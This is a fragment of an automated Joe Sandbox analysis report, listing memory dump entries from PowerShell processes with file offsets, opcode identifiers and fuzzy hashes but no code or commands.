                                                                                  • Source File: 0000000A.00000002.1772440352.00007FFD9B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B370000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b370000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: e84a586dcc966f2da4a7cee10b5a8ed5f40e3d7a1628174f1523b0c2d2dd2964
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: 83E01A31B1C8088FDA78EA4CE0919AD73E5EB9833171201BFD14EC7571CA26FD518B80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.1771882044.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd9b2a0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                  • API String ID: 0-3225005683
                                                                                  • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction ID: 6b1fca80049b040f946fd84a8d6541325269d1e23169487ca6f8bb20b7c65ad0
                                                                                  • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                                  • Instruction Fuzzy Hash: 8B21F6B77086359ED3157FBEB819DED3740CF9427434552F2D2A98B093EA1470868AD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 514c1750924aa37780af0d0f581310c1286a2224d1c67507935242a836ec282b
                                                                                  • Instruction ID: 29d06077e2a507974b9cebb6b494ec78222639af80f1fb448a31dbee383c2add
                                                                                  • Opcode Fuzzy Hash: 514c1750924aa37780af0d0f581310c1286a2224d1c67507935242a836ec282b
                                                                                  • Instruction Fuzzy Hash: 1DC13832B0EE8E0FEBA5EBA858659757BD1EF55314F0941BED05DC70E7DA28AD008342
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1917121954.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b380000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afcec5a3d6a439fad0de0cccf6ce178f43e5d2e654418bca58bab0b2d06cae76
                                                                                  • Instruction ID: 682e9cea1d2d329ef9b958baf7f24e9182bcf7c4c0da1354f2b5db64739617ff
                                                                                  • Opcode Fuzzy Hash: afcec5a3d6a439fad0de0cccf6ce178f43e5d2e654418bca58bab0b2d06cae76
                                                                                  • Instruction Fuzzy Hash: 9E810322A0FECA0FEBB5EAE858755347A91EF55314F5A41FED04DCB0E7D928AD048342
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf5e9377e63672570fc68cf585a48101193cd2efe63a313d895ce2a89b80ec9a
                                                                                  • Instruction ID: d7051700ed8c6cae2675849df99ea689f97587fae59b39a9847eab084b980f05
                                                                                  • Opcode Fuzzy Hash: bf5e9377e63672570fc68cf585a48101193cd2efe63a313d895ce2a89b80ec9a
                                                                                  • Instruction Fuzzy Hash: 80411971A0EB885FE719DF6C9C1A6B97FE0FB56310F0441AFD49883193CA64A945CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1915405342.00007FFD9B19D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B19D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b19d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2eff7414a1bca8d223ab2533061ed9e7a737f33e51f10f379188bd90dc7b7b51
                                                                                  • Instruction ID: 3dcf90ca76fb19e40a190e89a57066bb46fe202ea81df524173c3a51b03bca3e
                                                                                  • Opcode Fuzzy Hash: 2eff7414a1bca8d223ab2533061ed9e7a737f33e51f10f379188bd90dc7b7b51
                                                                                  • Instruction Fuzzy Hash: 24412B7240EBC84FE7568B38E8559523FF0EF56324B1605DFD089CB1A3D625A84AC792
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cb6ded680f7aa1d9ee4d731fe2679ec9180f78085057d23270dd1a33b843648d
                                                                                  • Instruction ID: c3334e68c7af30e11fda3a203106f7206c14815322e7bb7b139fe413b808356e
                                                                                  • Opcode Fuzzy Hash: cb6ded680f7aa1d9ee4d731fe2679ec9180f78085057d23270dd1a33b843648d
                                                                                  • Instruction Fuzzy Hash: 5121FB3190C74C4FDB59DF9C984A7E97BF0EB56321F04426BD049C3162DA74945ACB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 807c17a5089f1b0bfba5e5b55c8a005175fb9006c50bcc30901789d240c54e2d
                                                                                  • Instruction ID: 6134c5d2a90f1f80c2796265adf7b64a07bf9a2add694e94967e2950964429c4
                                                                                  • Opcode Fuzzy Hash: 807c17a5089f1b0bfba5e5b55c8a005175fb9006c50bcc30901789d240c54e2d
                                                                                  • Instruction Fuzzy Hash: 671125BA95FBDD2EDB928F289C644917FF0FF63600B0542ABD0C8CB162EE105949CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1916340222.00007FFD9B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b2b0000_powershell.jbxd